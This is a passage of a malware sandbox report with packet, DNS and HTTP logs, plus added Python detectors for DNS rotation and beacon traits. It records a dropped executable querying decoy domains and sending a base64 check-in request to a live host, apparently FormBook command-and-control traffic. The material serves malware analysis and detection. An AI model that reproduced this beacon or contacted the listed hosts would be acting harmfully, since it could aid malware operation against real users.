                                        Sep 3, 2024 13:55:49.114168882 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.114181995 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116168976 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116182089 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116235971 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.116235971 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.894484997 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.907097101 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.912003040 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.919193983 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.925137043 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.929977894 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.929989100 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930005074 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930013895 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930022001 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930130959 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930140018 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930145025 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930179119 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697757959 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697773933 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697783947 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697794914 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697808027 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697818995 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697829962 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697839975 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697845936 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.697851896 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697866917 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697889090 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.697909117 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.702735901 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.702784061 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.702876091 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.703064919 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.772559881 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.787683010 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787703037 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787717104 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787729979 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787744045 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787744045 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.787772894 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788081884 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788093090 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788105011 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788117886 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788144112 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788153887 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788156033 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788234949 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789256096 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789268017 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789278984 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789290905 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789303064 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789307117 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789336920 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789800882 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789841890 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789844036 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789861917 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789874077 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789885044 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789906979 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789936066 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.790714979 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790760994 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790772915 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790801048 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.792558908 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.792603016 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877027988 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877042055 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877059937 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877070904 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877084017 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877087116 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877125978 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877177954 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877197027 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877207994 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877218962 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877218962 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877232075 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877269983 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877299070 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877479076 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877528906 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877540112 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877574921 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877966881 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877976894 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877986908 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877990961 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878000975 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878011942 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878031969 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878056049 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878243923 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878253937 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878263950 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878276110 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878284931 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878288031 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878302097 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878313065 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878339052 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878458023 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878494024 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:52.682677984 CEST4977280192.168.2.4162.55.254.209
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 3, 2024 13:53:31.054550886 CEST | 52971 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:53:31.802867889 CEST | 53 | 52971 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:53:47.828717947 CEST | 64958 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:53:47.848047018 CEST | 53 | 64958 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:54:01.577070951 CEST | 60352 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:54:01.615005016 CEST | 53 | 60352 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:54:15.279043913 CEST | 52570 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:54:15.289107084 CEST | 53 | 52570 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:54:28.358705997 CEST | 62323 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:54:28.540698051 CEST | 53 | 62323 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:54:42.280206919 CEST | 61907 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:54:42.387837887 CEST | 53 | 61907 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:54:55.623855114 CEST | 62748 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:54:55.930860996 CEST | 53 | 62748 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:55:09.201997995 CEST | 60185 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:55:09.374074936 CEST | 53 | 60185 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:55:23.766077042 CEST | 54909 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:55:23.920747042 CEST | 53 | 54909 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:55:32.028116941 CEST | 62792 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:55:32.151827097 CEST | 53 | 62792 | 1.1.1.1 | 192.168.2.4
Sep 3, 2024 13:55:45.627090931 CEST | 59527 | 53 | 192.168.2.4 | 1.1.1.1
Sep 3, 2024 13:55:45.665302038 CEST | 53 | 59527 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 3, 2024 13:53:31.054550886 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e9f | Standard query (0) | www.weep.site | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:53:47.828717947 CEST | 192.168.2.4 | 1.1.1.1 | 0x96d3 | Standard query (0) | www.88nn.pro | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:01.577070951 CEST | 192.168.2.4 | 1.1.1.1 | 0xa9b1 | Standard query (0) | www.fontanerourgente.net | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:15.279043913 CEST | 192.168.2.4 | 1.1.1.1 | 0xb002 | Standard query (0) | www.onlytradez.club | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:28.358705997 CEST | 192.168.2.4 | 1.1.1.1 | 0xac12 | Standard query (0) | www.32wxd.top | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:42.280206919 CEST | 192.168.2.4 | 1.1.1.1 | 0x3da5 | Standard query (0) | www.jaxo.xyz | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:55.623855114 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbf1 | Standard query (0) | www.xforum.tech | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:09.201997995 CEST | 192.168.2.4 | 1.1.1.1 | 0x5253 | Standard query (0) | www.cannulafactory.top | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:23.766077042 CEST | 192.168.2.4 | 1.1.1.1 | 0x216d | Standard query (0) | www.taapbit.online | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:32.028116941 CEST | 192.168.2.4 | 1.1.1.1 | 0x9669 | Standard query (0) | www.ayypromo.shop | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:45.627090931 CEST | 192.168.2.4 | 1.1.1.1 | 0x93d3 | Standard query (0) | www.anaidittrich.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 3, 2024 13:53:31.802867889 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e9f | No error (0) | www.weep.site | weep.site | | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 13:53:31.802867889 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e9f | No error (0) | weep.site | | 194.233.65.154 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:53:47.848047018 CEST | 1.1.1.1 | 192.168.2.4 | 0x96d3 | No error (0) | www.88nn.pro | | 45.157.69.194 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:01.615005016 CEST | 1.1.1.1 | 192.168.2.4 | 0xa9b1 | No error (0) | www.fontanerourgente.net | fontanerourgente.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 13:54:01.615005016 CEST | 1.1.1.1 | 192.168.2.4 | 0xa9b1 | No error (0) | fontanerourgente.net | | 37.187.158.211 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:15.289107084 CEST | 1.1.1.1 | 192.168.2.4 | 0xb002 | No error (0) | www.onlytradez.club | | 167.172.133.32 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:28.540698051 CEST | 1.1.1.1 | 192.168.2.4 | 0xac12 | No error (0) | www.32wxd.top | 32wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 3, 2024 13:54:28.540698051 CEST | 1.1.1.1 | 192.168.2.4 | 0xac12 | No error (0) | 32wxd.top | | 206.119.82.116 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:42.387837887 CEST | 1.1.1.1 | 192.168.2.4 | 0x3da5 | No error (0) | www.jaxo.xyz | | 66.29.149.180 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:54:55.930860996 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbf1 | No error (0) | www.xforum.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:09.374074936 CEST | 1.1.1.1 | 192.168.2.4 | 0x5253 | No error (0) | www.cannulafactory.top | | 18.183.3.45 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:23.920747042 CEST | 1.1.1.1 | 192.168.2.4 | 0x216d | Name error (3) | www.taapbit.online | none | none | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:32.151827097 CEST | 1.1.1.1 | 192.168.2.4 | 0x9669 | No error (0) | www.ayypromo.shop | | 176.57.64.102 | A (IP address) | IN (0x0001) | false
Sep 3, 2024 13:55:45.665302038 CEST | 1.1.1.1 | 192.168.2.4 | 0x93d3 | No error (0) | www.anaidittrich.com | | 162.55.254.209 | A (IP address) | IN (0x0001) | false
                                        • www.weep.site
                                        • www.88nn.pro
                                        • www.fontanerourgente.net
                                        • www.onlytradez.club
                                        • www.32wxd.top
                                        • www.jaxo.xyz
                                        • www.xforum.tech
                                        • www.cannulafactory.top
                                        • www.ayypromo.shop
                                        • www.anaidittrich.com
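Added example (not part of the Joe Sandbox report): a cadence and diversity check over the eleven DNS lookups listed above. The timestamps, names and reply codes are transcribed from the DNS query and answer tables; the 20 % tolerance and the thresholds in looks_like_decoy_rotation are assumptions chosen for illustration, not sandbox settings.

```python
"""Cadence and diversity check over the DNS lookups in the report above.

Added example for this page, not part of the Joe Sandbox report. The
rows in DNS_LOOKUPS are transcribed from the report's DNS query and
answer tables; the tolerance and thresholds are assumptions.
"""
import re
import statistics
from datetime import datetime

# Transcribed from the DNS tables above: query time, queried name, and the
# reply code the resolver returned for that transaction ID.
DNS_LOOKUPS = [
    ("Sep 3, 2024 13:53:31.054550886 CEST", "www.weep.site", "No error (0)"),
    ("Sep 3, 2024 13:53:47.828717947 CEST", "www.88nn.pro", "No error (0)"),
    ("Sep 3, 2024 13:54:01.577070951 CEST", "www.fontanerourgente.net", "No error (0)"),
    ("Sep 3, 2024 13:54:15.279043913 CEST", "www.onlytradez.club", "No error (0)"),
    ("Sep 3, 2024 13:54:28.358705997 CEST", "www.32wxd.top", "No error (0)"),
    ("Sep 3, 2024 13:54:42.280206919 CEST", "www.jaxo.xyz", "No error (0)"),
    ("Sep 3, 2024 13:54:55.623855114 CEST", "www.xforum.tech", "No error (0)"),
    ("Sep 3, 2024 13:55:09.201997995 CEST", "www.cannulafactory.top", "No error (0)"),
    ("Sep 3, 2024 13:55:23.766077042 CEST", "www.taapbit.online", "Name error (3)"),
    ("Sep 3, 2024 13:55:32.028116941 CEST", "www.ayypromo.shop", "No error (0)"),
    ("Sep 3, 2024 13:55:45.627090931 CEST", "www.anaidittrich.com", "No error (0)"),
]

# "Sep 3, 2024 13:53:31.054550886 CEST": nine fractional digits, zone name.
TS_RE = re.compile(
    r"^(?P<base>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) [A-Z]+$")


def parse_sandbox_timestamp(text):
    """Seconds since 1970-01-01 00:00 in the report's own zone, as a float.

    datetime's %f takes at most six fractional digits and the sandbox
    prints nine, so the fraction is added by hand. Only differences
    between timestamps are used below, so the zone offset cancels.
    """
    m = TS_RE.match(text)
    if m is None:
        raise ValueError(f"unrecognised sandbox timestamp: {text!r}")
    base = datetime.strptime(m["base"], "%b %d, %Y %H:%M:%S")
    frac = int(m["frac"]) / 10 ** len(m["frac"])
    return (base - datetime(1970, 1, 1)).total_seconds() + frac


def registrable_domain(name):
    """Last two labels. Fine for the names above; a real pipeline should
    use the public suffix list so that names like example.co.uk work."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def dns_profile(lookups, tolerance=0.2):
    """Summarise timing and diversity of a sequence of (ts, name, rcode)."""
    if len(lookups) < 2:
        raise ValueError("need at least two lookups to measure a cadence")
    times = [parse_sandbox_timestamp(ts) for ts, _, _ in lookups]
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    median_gap = statistics.median(gaps)
    # A gap is "regular" when it lies within +/- tolerance of the median.
    regular = sum(1 for g in gaps if abs(g - median_gap) <= tolerance * median_gap)
    return {
        "lookups": len(lookups),
        "median_gap_s": median_gap,
        "regular_fraction": regular / len(gaps),
        "distinct_domains": len({registrable_domain(n) for _, n, _ in lookups}),
        "nxdomain": [n for _, n, rc in lookups if rc.startswith("Name error")],
    }


def looks_like_decoy_rotation(profile, min_domains=8, min_regular=0.7):
    """Many unrelated registrable domains resolved at a steady cadence.

    A browser or updater resolves a few related names in bursts; one
    process walking through unrelated domains every ~14 s, one of which
    does not even exist, is what the report's "DNS queries to domains
    with low reputation" signature reacts to. Thresholds are assumptions.
    """
    return (profile["distinct_domains"] >= min_domains
            and profile["regular_fraction"] >= min_regular)


if __name__ == "__main__":
    profile = dns_profile(DNS_LOOKUPS)
    print(profile)
    print("decoy rotation:", looks_like_decoy_rotation(profile))
```

On the rows above the lookups land roughly every 13 to 14 s (8 of the 10 gaps within 20 % of the median), every name is a different registrable domain, and www.taapbit.online returns NXDOMAIN. That combination, coming from a single process, is a more durable hunting feature than any of the individual names.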
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 194.233.65.154 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
Timestamp | Bytes transferred | Direction | Data
Sep 3, 2024 13:53:31.821599960 CEST | 479 | OUT | GET /v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.weep.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
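Added example (not part of the Joe Sandbox report): a check of the GET above for the traits that separate it from browser traffic. The request bytes and the sending-process path are transcribed from the session table; the path and parameter regexes are derived from this single request and are an assumption, not a vendor signature, so they need tuning against more samples before use in detection.

```python
"""Inspect the check-in request above for beacon traits.

Added example for this page, not part of the Joe Sandbox report. The
request and process path are transcribed from the report; BENIGN_REQUEST
is a constructed control case; the regexes are assumptions derived from
this one request.
"""
import base64
import re

# Transcribed from the HTTP session above (CRLF line endings restored).
SAMPLE_REQUEST = (
    "GET /v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt"
    "/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 HTTP/1.1\r\n"
    "Host: www.weep.site\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36\r\n"
    "\r\n"
)
# Process that owned the socket, from the session table above.
SAMPLE_PROCESS = (r"C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr"
                  r"\eVmdoPPWSZoVOB.exe")

# Constructed control case: an ordinary page load from a desktop browser.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Referer: https://www.example.com/\r\n"
    "Cookie: session=abc\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0\r\n"
    "\r\n"
)

# Shape of the request line above (assumption): one short alphanumeric path
# segment, then exactly two query parameters, a long base64 blob and a token.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,24}$")
UA_LOCALE_RE = re.compile(r";\s*([a-z]{2}-[a-z]{2})\s*;")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_query(target):
    """Split path and query WITHOUT percent or plus decoding.

    urllib.parse.parse_qsl would turn the '+' inside the blob into a space
    and silently corrupt the base64, so the raw text is kept for matching.
    """
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((key, value))
    return path, params


def decode_blob(value):
    """Strict base64 decode of the first parameter; its content stays opaque here."""
    return base64.b64decode(value, validate=True)


def beacon_findings(raw, process_path):
    """Return the traits that distinguish this request from browsing."""
    method, target, headers = parse_request(raw)
    path, params = split_query(target)
    findings = []
    if (method == "GET" and PATH_RE.match(path) and len(params) == 2
            and len(params[0][0]) <= 4 and BLOB_RE.match(params[0][1])
            and len(params[1][0]) <= 4 and TOKEN_RE.match(params[1][1])):
        findings.append("formbook_uri_shape")
    ua = headers.get("user-agent", "")
    # An Android tablet User-Agent sent by a Windows PE under Program Files.
    if "android" in ua.lower() and process_path.lower().endswith(".exe"):
        findings.append("ua_os_mismatch")
    # The User-Agent says de-de while Accept-Language says en-US.
    ua_locale = UA_LOCALE_RE.search(ua)
    accept = headers.get("accept-language", "").split(",")[0].split(";")[0].strip().lower()
    if ua_locale and accept and ua_locale.group(1) != accept:
        findings.append("ua_locale_mismatch")
    # One-shot GET: Connection: close, no Referer, no Cookie.
    if (headers.get("connection", "").lower() == "close"
            and "referer" not in headers and "cookie" not in headers):
        findings.append("bare_one_shot_get")
    return findings


if __name__ == "__main__":
    print(beacon_findings(SAMPLE_REQUEST, SAMPLE_PROCESS))
    print(beacon_findings(BENIGN_REQUEST, r"C:\Program Files\Mozilla Firefox\firefox.exe"))
```

Each finding is weak on its own (plenty of legitimate clients send Connection: close), but the four together, an opaque blob in a two-parameter GET, a Samsung tablet User-Agent emitted by a freshly dropped .exe under Program Files (x86), a de-de locale in the User-Agent against en-US in Accept-Language, and no Referer or Cookie, describe a check-in, not a page view. The server's 404 says nothing about the payload: decoy hosts answer whatever their web server answers.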
Sep 3, 2024 13:53:32.768141985 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:53:32 GMT
                                        Server: Apache
                                        Accept-Ranges: bytes
                                        Cache-Control: no-cache, no-store, must-revalidate
                                        Pragma: no-cache
                                        Expires: 0
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html
                                        Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                        Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
